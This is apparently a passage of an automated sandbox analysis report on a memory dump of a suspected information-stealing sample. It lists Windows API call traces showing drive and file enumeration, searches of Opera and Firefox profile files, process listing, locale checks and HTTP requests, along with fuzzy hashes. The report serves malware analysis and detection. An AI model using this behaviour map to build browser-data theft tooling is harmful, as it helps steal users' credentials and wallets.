                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                                  • API String ID: 1687531150-1805413626
                                                                                                                                                                                                                                                                  • Opcode ID: 3e5564a870a27417cf46eba37ab5099a00ce7b7e59e4c09bbcd249fd77c5e8aa
                                                                                                                                                                                                                                                                  • Instruction ID: c4ff353b26ca2936590122ceef1c82b8242eae7be842382444ee261e2db76ed5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5564a870a27417cf46eba37ab5099a00ce7b7e59e4c09bbcd249fd77c5e8aa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 715180B2900219AFDF10DFE0CC85AEFBBBDEB49744F10112AFA11B6190D7785E858B65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415BCB
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415BEE
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415C05
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415C27
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415C41
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415C76
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00415C89
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415C9D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415CAD
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004268DC), ref: 00415CBF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415CD3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00415D6D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00415D7C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %s\%s
                                                                                                                                                                                                                                                                  • API String ID: 2282932919-4073750446
                                                                                                                                                                                                                                                                  • Opcode ID: ce71aef62abef621f80aff9973deaaaae97e03204973064a8a74a4f4b98bcba4
                                                                                                                                                                                                                                                                  • Instruction ID: f32957f4585b5af1fae8c999d09262e5e24cc4202797a4ac40e028ac13c9c202
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce71aef62abef621f80aff9973deaaaae97e03204973064a8a74a4f4b98bcba4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09513FB2800219ABCF10EBB1DD49ADE7B7DBF59314F0444AAF605E3051E7399789CBA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409FCA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A0A3
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A0BD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A150
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A164
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A178
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 3869166975-536343317
                                                                                                                                                                                                                                                                  • Opcode ID: b52eab3a6815ed49cefb5586dc1aa422f4cc1b01995f7dfad9cc985fb07e9c68
                                                                                                                                                                                                                                                                  • Instruction ID: ea3a79174f4d2047dc566d2b1852688a17d13d676ef7a484e91dd8d862b914bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52eab3a6815ed49cefb5586dc1aa422f4cc1b01995f7dfad9cc985fb07e9c68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A428D70904288EACF15EBA5C955BDDBBB46F29308F5440BEE409732C2DB781B4CCB66
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041594C
                                                                                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004159AE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004159CD
                                                                                                                                                                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004159D6
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004159F6
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00415A14
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: _EH_prolog.MSVCRT ref: 004154FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 00415525
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: FindFirstFileA.KERNEL32(?,?), ref: 0041553C
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 00415553
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 00415561
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041557F
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,00426850), ref: 00415599
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 004155BD
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,0042655E), ref: 004155CE
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 004155F4
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 0041561A
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: lstrcat.KERNEL32(?,?), ref: 0041562C
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: strtok_s.MSVCRT ref: 00415665
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 0041567A
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: lstrcat.KERNEL32(?,?), ref: 0041568F
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00415A37
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00415A9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                  • API String ID: 2879972474-147700698
                                                                                                                                                                                                                                                                  • Opcode ID: 29b0693086406cfaf3a2a035cad38e27a288f3ef43e961fefa16bbefe2720e07
                                                                                                                                                                                                                                                                  • Instruction ID: f93de844b1a18675290aa6fa134bd3a03e4539652274f487bcb42a8085c79367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b0693086406cfaf3a2a035cad38e27a288f3ef43e961fefa16bbefe2720e07
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F5193B1900258EBDF30EF61DC95EEE3B7CAF01348F50402AB519A6592DB385A89CB55
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406269
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004145A2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                  • String ID: 7$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 40499504-4165053604
                                                                                                                                                                                                                                                                  • Opcode ID: df3af5913ac66384c4ac91487087571275edd9b99ba1baadde4567d7484321d1
                                                                                                                                                                                                                                                                  • Instruction ID: 8ce24c7d6f897ddb31f2fe60510d5ab534ddbf0f9374ab348d72f62bdee6a657
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df3af5913ac66384c4ac91487087571275edd9b99ba1baadde4567d7484321d1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12625C70904288EADF15E7E4D955BDDBBB86F19308F5440BEA40A735C2EB781B4CCB26
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B4BB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B53A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B55E
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B578
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B614
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B719
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B7EE
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B89D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B8AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                  • String ID: prefs.js
                                                                                                                                                                                                                                                                  • API String ID: 2318033617-3783873740
                                                                                                                                                                                                                                                                  • Opcode ID: b767b6bbc18f6e640dd923ce44a78389a87468a3cd493a85dd72a84e1a454d7b
                                                                                                                                                                                                                                                                  • Instruction ID: ebdaa208b6f6b48960125bb055502522e666457ca282af0fd5dc55d4e58b1859
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b767b6bbc18f6e640dd923ce44a78389a87468a3cd493a85dd72a84e1a454d7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D18471904248EADF14EBA5D945BDDBBB49F15308F1440BEE409B36C2DB781B4CCBA6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040953D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 004095BA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E20), ref: 004095D7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E24), ref: 004095F1
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409688
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00409709
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004087AC: _EH_prolog.MSVCRT ref: 004087B1
                                                                                                                                                                                                                                                                    • Part of subcall function 004087AC: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408894
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(00000000,?), ref: 004098F2
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00409901
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 322284088-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040FD31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD63
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD71
                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD7C
                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FDA6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040FE4A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                  • API String ID: 2868853201-4001269591
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004111A9
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111CF
                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004111DF
                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004111F1
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 00411205
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411218
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 186290926-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004280A0,00000000,00000001,00426478,00000000,?), ref: 0041072C
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0041073A
                                                                                                                                                                                                                                                                  • _wtoi64.MSVCRT ref: 0041077C
